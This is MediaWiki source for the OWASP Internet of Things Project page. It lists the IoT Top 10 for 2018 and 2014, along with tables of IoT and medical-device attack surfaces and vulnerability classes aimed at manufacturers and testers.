Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div><br />
<br />
Aaron.guzman https://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246184 OWASP Internet of Things Project 2018-12-19T23:53:17Z<p>Aaron.guzman: /* Project Leaders */</p><br />
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the 2018 OWASP IoT Top 10.<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants, whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 10 2018 Contributors ==<br />
* Vishruta Rudresh<br />
* Vijayamurugan Pushpanathan<br />
* Aaron Guzman<br />
* Alexander Lafrenz<br />
* Masahiro Murashima<br />
* Charlie Worrell<br />
* José A. Rivas (jarv)<br />
* Pablo Endres<br />
* Ade Yoseman<br />
* Cédric LEVY-BENCHETON<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and the attacks they are known to be exposed to (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physically)<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* The service can be attacked in a way that denies access to that service or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software-based security controls.<br />
* Side-channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single-user mode, but those can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
